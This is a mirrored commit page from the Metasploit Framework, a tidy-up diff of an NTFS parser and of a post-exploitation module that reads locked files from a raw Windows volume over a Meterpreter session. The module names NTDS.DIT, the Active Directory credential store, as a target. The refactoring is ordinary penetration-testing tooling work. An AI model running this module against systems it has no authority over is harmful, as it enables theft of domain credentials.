infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1 from Meatballs1/ntfs_read 

Small tidyup
bug/bundler_fix
danilbaz 2015-02-07 16:53:37 +01:00
parent 970c5d115a 358ab2590e
commit dc94e9fb6e
2 changed files with 25 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/rex/parser/fs/ntfs.rb
View File

@ -236,7 +236,7 @@ module Rex
def file(path)
repertory = mft_record_from_mft_num(5)
index_entry = {}
for r in path.split('\\')
path.split('\\').each do |r|
attributes = mft_record_attribute(repertory)
index = index_list_from_attributes(attributes)
unless index.key?(r)

47
modules/post/windows/gather/file_in_raw_ntfs.rb
View File

@ -3,26 +3,27 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/parser/fs/ntfs'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
require "rex/parser/fs/ntfs"
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows File Gathering In Raw NTFS',
'Description' => %q{
'Description' => %q(
This module gather file using the raw NTFS device, bypassing some Windows restriction.
Gather file from disk bypassing restriction like already open file with write right lock.
Can be used to retreive file like NTDS.DIT
},
Can be used to retreive file like NTDS.DIT),
'License' => 'MSF_LICENSE',
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Author' => ['Danil Bazin <danil.bazin[at]hsc.fr>'], #@danilbaz
'Author' => ['Danil Bazin <danil.bazin[at]hsc.fr>'], # @danilbaz
'References' => [
[ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ]
]
))
register_options(
[
OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil])
@ -32,46 +33,46 @@ class Metasploit3 < Msf::Post
def run
winver = sysinfo["OS"]
if winver =~ /2000/i
print_error("Module not valid for Windows 2000")
return
end
unless is_admin?
print_error("You don't have enough privileges")
return
end
fail_with(Exploit::Failure::NoTarget, 'Module not valid for Windows 2000') if winver =~ /2000/
fail_with(Exploit::Failure::NoAccess, 'You don\'t have administrative privileges') unless is_admin?
file_path = datastore['FILE_PATH']
r = client.railgun.kernel32.GetFileAttributesA(file_path)
if r['GetLastError'] != 0
print_error("The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts")
return nil
fail_with(
Exploit::Failure::BadConfig,
'The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts'
)
end
drive = file_path[0, 2]
r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", "GENERIC_READ", "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE",
nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}",
'GENERIC_READ',
'FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE',
nil,
'OPEN_EXISTING',
'FILE_FLAG_WRITE_THROUGH',
0)
if r['GetLastError'] != 0
print_error("Error opening #{drive} GetLastError=#{r['ErrorMessage']}")
return nil
fail_with(
Exploit::Failure::Unknown,
"Error opening #{drive}. Windows Error Code: #{r['GetLastError']} - #{r['ErrorMessage']}")
end
@handle = r['return']
print_status("Successfuly opened #{drive}")
begin
fs = Rex::Parser::NTFS.new(self)
print_status("Trying gather #{file_path}")
print_status("Trying to gather #{file_path}")
path = file_path[3, file_path.length - 3]
data = fs.file(path)
file_name = file_path.split("\\")[-1]
stored_path = store_loot("windows.file", 'application/octet-stream', session, data, file_name, "Windows file")
print_good("Saving file : #{stored_path}")
rescue ::Exception => e
print_error("Post failed : #{e.backtrace}")
ensure
client.railgun.kernel32.CloseHandle(@handle)
end